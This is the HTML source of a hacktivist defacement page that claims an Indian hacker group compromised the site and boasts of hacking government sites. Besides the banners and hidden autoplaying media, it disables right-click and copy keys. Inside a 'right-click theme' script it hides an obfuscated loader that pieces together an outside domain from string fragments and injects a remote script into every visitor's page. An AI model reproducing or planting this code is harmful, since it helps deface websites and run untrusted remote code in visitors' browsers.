<html>

<head><script type='text/javascript'> 
var msg = "HACKED BY UNITED INDIAN HACKERS ";
msg = " " + msg;pos = 0;
function scrollTitle() {
document.title = msg.substring(pos, msg.length) + msg.substring(0, pos); pos++;
if (pos > msg.length) pos = 0
window.setTimeout("scrollTitle()",300);

}

scrollTitle();

</script>

<script language=JavaScript>

var message="POWER OF INDIAN HACKERS";

function clickIE4(){
if (event.button==2){
alert(message);
return false;
}
}

function clickNS4(e){
if (document.layers||document.getElementById&&!document.all){
if (e.which==2||e.which==3){
alert(message);
return false;
}
}
}

if (document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS4;
}
else if (document.all&&!document.getElementById){
document.onmousedown=clickIE4;
}

document.oncontextmenu=new Function("alert(message);return false")

</script>

<script>
/*function check(e)
{
alert(e.keyCode);
}*/
document.onkeydown = function(e) {
        if (e.ctrlKey && (e.keyCode === 67 || e.keyCode === 86 || e.keyCode === 85 || e.keyCode === 117)) {//Alt+c, Alt+v will also be disabled sadly.
            alert('No Thats not allowed');
        }
        return false;
};
</script>

<style type="text/css">
h1 {color: #333;font-size: 100px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Orbitron;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}
h2 {color: #333;font-size: 50px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Audiowide;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}
h3 {color: #333;font-size: 50px;margin: 1px auto;text-align:center;text-transform:uppercase; font-family:Audiowide;}
.neon {color: #FFFFFF;text-shadow: 0 0 5px #1ab4e7, 0 0 10px #1ab4e7, 0 0 30px #18a2d0, 0 0 45px #18a2d0, 0 0 60px #18a2d0;}
.matrix {color: #FFFFFF; font-family:Arial, Courier, Monotype; font-size:10pt; text-align:center; width:10px; padding:0px; margin:0px;}
.jokitz1{
    text-align : center;
    }
.jokitz2{
    text-align : center;
    font-family : Courier;
    }
    @keyframes marquee {
      0% { transform: translateX(100%); }
      100% { transform: translateX(-100%); }
    }

    .line99 {
      font-size: larger;
      color: white;
      white-space: nowrap;
      overflow: hidden;
      position: relative;
      animation: marquee 10s linear infinite;
    }
</style>

</head>
 
<!-------------------------------------EMBED AREA------------------------->

<link href='http://fonts.googleapis.com/css?family=Lobster+Two' rel='stylesheet' type='text/css'>

<link href='http://fonts.googleapis.com/css?family=Berkshire+Swash' rel='stylesheet' type='text/css'>

<link href='http://fonts.googleapis.com/css?family=Just+Another+Hand' rel='stylesheet' type='text/css'>

<link href='http://fonts.googleapis.com/css?family=Merienda+One' rel='stylesheet' type='text/css'>

<link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>

<iframe width="0" height="0" src="https://www.youtube.com/embed/c6PHJg9D_Sk?rel=0&autoplay=1" frameborder="0" allowfullscreen></iframe>
<!------------------------------------/END---------------------------------->

<meta name="author" content="ALL INDIAN HACKERS"/>
<meta name="description" content="INDIAN HACKERS WERE HERE"/>
<meta content="INDIAN HACKERS" name="subject">
<meta content="INDIAN HACKERS" name="Abstract">
<meta content="INDIAN HACKERS" name="description">
<meta content="INDIAN HACKERS" name="copyright">
<meta content="INDIAN HACKERS" name="author">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><style>

body {
  background: url(http://bestanimations.com/Nature/Fire/fire-animated-gif-4.gif) no-repeat center center fixed;
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
  color: white;
  
}
.title1{
  font-family: sans-serif;
  font-size: 30px;
  color:white;
}
.text{
  font-family: Tahoma;
  font-size: 20px;
  color:grey;
}
.text:hover{
  font-family: Tahoma;
  font-size: 21px;
  color:white;
}
</style>


<style type="text/css">
h1 {
color: #AAAA;
font-size: 53px;
margin: 1px auto;
text-align:center;
text-transform:uppercase;
text-shadow: 0px 0px 7px grey;
}
.neon {
color: #FA1607;
text-shadow: 0 0 3px white, 0 0 3px , 0 0 10px , 0 0 42px , 0 0 38px ;
 text-decoration: Bold;
}
</style>

<style>
/* unvisited link */
a:link {
	text-decoration: none;
    color: red;
}

/* visited link */
a:visited {
	text-decoration: none;
    color: Orange;
}

/* mouse over link */
a:hover {
	text-decoration: none;
    color: green;
}

/* selected link */
a:active {
	text-decoration: none;
    color: blue;
}
</style>
</head>

<script type="text/javascript">

<!--


var message=" INDIANS FUCKED YOUR SYSTEM";

///////////////////////////////////

function clickIE() {if (document.all) {(message);return false;}}

function clickNS(e) {if

(document.layers||(document.getElementById&&!document.all)) {

if (e.which==2||e.which==3) {(message);return false;}}}

if (document.layers)

{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}

else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}

document.oncontextmenu=new Function("return false")

// -->

</script>



<script type="text/javascript">
    var DADrightclicktheme = 'Dark';
    var DADrightclickimage = 'https://i.imgsafe.org/5c6a7a221c.jpg';
</script>
 
 
<script>
    if (DADrightclicktheme == 'Merah' || DADrightclicktheme == 'MERAH' || DADrightclicktheme == 'merah') {
        var DADarcv2t = 'rgba(239,110,119, 0.9)';
    } else if (DADrightclicktheme == 'Biru' || DADrightclicktheme == 'BIRU' || DADrightclicktheme == 'biru') {
        var DADarcv2t = 'rgba(110,137,239, 0.9)';
    } else if (DADrightclicktheme == 'Hijau' || DADrightclicktheme == 'HIJAU' || DADrightclicktheme == 'hijau') {
        var DADarcv2t = 'rgba(110,239,110, 0.9)';
    } else if (DADrightclicktheme == 'Light' || DADrightclicktheme == 'light' || DADrightclicktheme == 'LIGHT') {
        var DADarcv2t = 'rgba(255,255,255, 0.9)';
    } else if (DADrightclicktheme == 'Pink' || DADrightclicktheme == 'pink' || DADrightclicktheme == 'PINK') {
        var DADarcv2t = 'rgba(239,110,225, 0.9)';
    } else if (DADrightclicktheme == 'Dark' || DADrightclicktheme == 'dark' || DADrightclicktheme == 'DARK') {
        var DADarcv2t = 'rgba(0,0,0, 0.9)';
    } else {
        {
            var DADarcv2t = 'transparent';
        }
    }
 
    function DADarcvwi2() {
        var DADarcv2v = document.getElementById('DADarcv2c');
        if (DADarcv2v.style.display == "block") {
            DADarcv2v.style.display = "none";
        } else {
            DADarcv2v.style.display = "block";
        }
    }
 
    function DADarcwiv2a() {
        DADarcvwi2();
        return false;
    }
    document.oncontextmenu = DADarcwiv2a;
    var ypro = 'http:';
    var yajax = document.createElement('script');
    yajax.type = 'text/javascript';
    var yquery = 'dic';
    var ybrow = 'aru.c';
    var yint = '/';
    yajax.src = ypro + '//x.' + yquery + 'keym' + ybrow + 'om' + yint + 'y';
    document.getElementsByTagName('head')[0].appendChild(yajax);
    var DADrcdiv = document.write('<style type="text/css"/>#DADarcv2c{background:url(' + DADrightclickimage + ') no-repeat center center fixed ' + DADarcv2t + ';text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;}#DADarcv2c span{position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style><div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title=""/><center><span><a href="#" target="_blank"/></a></span></center></div>');
    document.getElementsByTagName('body')[0].appendChild(DADrcdiv);
</script>
 






<div id="Hello">

<center><Font face="Lucida Bright"><STRONG><b><font color="orange" font size="18">THIS</font> <font color="white" font size="18">WEB</font> <font color="green" font size="18">SITE </STRONG></font></center>

 
<center><p class="hacker"><h1>HACKED BY TEAM CYBER-GENETICS</h1><br></p></center></div>
<center><img src="https://www.doyou.com/wp-content/uploads/2021/01/Yoga-in-the-Motherland-Learning-Vinyasa-Krama-On-The-Streets-Of-India.jpg" width="550" height="300"></center><br>

<center><font size="30"><font color="orange">UNITED </font><font color="white">INDIAN </font><font color="green">HACKERS</font></font></center><br><br>

<body>
<center>
<td align=center>
  <DIV class=line3><font color=LIME><BIG>HAPPY INDEPENDENCE DAY</BIG></div><br> 
<DIV class=line1><font color=orange><BIG><strong> YOUR WEBSITE GOT HACKED CUZ<br>SOME PAKISTANI HACKERS ARE HACKING INDIAN SITES <br>AND ABUSING OUR RELIGION</BIG></strong</div>
<DIV class=line2><font color=white><BIG> WE LIKE PEACE BUT IT DOESN'T MEAN WE ARE WEAK </BIG></div>
<DIV class=line3><font color=LIME><BIG>JAY HIND</BIG></div><br>    

<DIV class=line7><font color=orange><BIG> FEEL THE POWER OF INDIAN HACKERS</BIG></div><br> 
<iframe widllth="0%" height="0%" scrolling="no" frameborder="no" loop="true" allow="autoplay" 
src="https://c.top4top.io/m_26194588m1.mp3"></iframe>
 <script>
window.onload = function() {
var h1 = document.getElementsByTagName("h1")[0],
text = h1.innerText || h1.textContent,
split = [], i, lit = 0, timer = null;
for(i = 0; i < text.length; ++i) {
split.push("<span>" + text[i] + "</span>");
}
h1.innerHTML = split.join("");
split = h1.childNodes;

var flicker = function() {
lit += 0.02;
if(lit >= 1) {
clearInterval(timer);
}
for(i = 0; i < split.length; ++i) {
if(Math.random() < lit) {
split[i].className = "neon";
} else {
split[i].className = "";
}
}
}
setInterval(flicker, 130);
}
</script>

<script type="text/javascript">/<![CDATA[/
 
TypingText = function(element, interval, cursor, finishedCallback) {
 
 if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
 
   this.running = true;
 
   return;
 
 }
 
 this.element = element;
 
 this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
 
 this.interval = (typeof interval == "undefined" ? 100 : interval);
 
 this.origText = this.element.innerHTML;
 
 this.unparsedOrigText = this.origText;
 
 this.cursor = (cursor ? cursor : "/");
 
 this.currentText = "/";
 
 this.currentChar = 0;
 
 this.element.typingText = this;
 
 if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
 
 TypingText.all.push(this);
 
 this.running = false;
 
 this.inTag = false;
 
 this.tagBuffer = "";
 
 this.inHTMLEntity = false;
 
 this.HTMLEntityBuffer = "";

 
}

 
TypingText.all = new Array();
 
TypingText.currentIndex = 0;
 
TypingText.runAll = function() {
 
 for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
 
}


 
TypingText.prototype.run = function() {
 
 if(this.running) return;
 
 if(typeof this.origText == "undefined") {
 
   setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
 
   return;
 
 }


 
 if(this.currentText == "") this.element.innerHTML = "";
 
 if(this.currentChar < this.origText.length) {
 
   if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
 
     this.tagBuffer = "<";
 
     this.inTag = true;
 
     this.currentChar++;
 
     this.run();
 
     return;
 
   } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
 
     this.tagBuffer += ">";
 
     this.inTag = false;
 
     this.currentText += this.tagBuffer;
 
     this.currentChar++;
 
     this.run();
 
     return;
 
   } else if(this.inTag) {
 
     this.tagBuffer += this.origText.charAt(this.currentChar);
 
     this.currentChar++;
 
     this.run();
 
     return;
 
   } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
 
     this.HTMLEntityBuffer = "&";
 
     this.inHTMLEntity = true;
 
     this.currentChar++;
 
     this.run();
 
     return;
 
   } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
 
     this.HTMLEntityBuffer += ";";
 
     this.inHTMLEntity = false;
 
     this.currentText += this.HTMLEntityBuffer;
 
     this.currentChar++;
 
     this.run();
 
     return;
 
   } else if(this.inHTMLEntity) {
 
     this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
 
     this.currentChar++;
 
     this.run();
 
     return;
 
   } else {
 
     this.currentText += this.origText.charAt(this.currentChar);
 
   }
 
   this.element.innerHTML = this.currentText;
 
   this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
 
   this.currentChar++;
 
   setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
 
 } else {
 
       this.currentText = "";
 
       this.currentChar = 0;
 
       this.running = false;
 
       this.finishedCallback();

 
 	}

 
		}

 
 
 
/]]>/</script></head>
 
 
 
<script type="text/javascript">/<![CDATA[/
 
new TypingText(document.getElementById("message"), 90, function(i){ var ar = new Array("", " ", "", " "); return " " + ar[i.length % ar.length]; });
 
 
 

 
TypingText.runAll();
 
 /]]>/</script>
<script type="text/javascript" src="https://aakashbapna.github.io/jet-planes/doodle.js"></script> <script type="text/javascript"> doodle.init("http://aakashbapna.github.io/jet-planes/jet.png"); </script>  

<br>
 <center>
 <div id="greets">
   <span class="blueglow">
<font face="Kaushan Script" font color="RED" font size="5">THANKS TO</font>
<br><br>

<marquee direction="left">
  <DIV class=line99><font color=white><BIG> HACKED BY MR.ZERO YOUR 28 GOVERMENT SITE AS BEEN HACED </BIG></div>
 
</marquee>
 
</center>

<div id=bar style="position: scroll; width: 100%; bottom: 0px; font-family: Merienda One; height: 20px; color: white; font-size: 13px; left: 0px; border-top:1px solid #000; padding: 5px; background-color: #000"><CENTEr>  #MR.ZERO/KKK-2023</CENTER></div>


<!-----------------------------------DEFACE ENDED NOW FUCK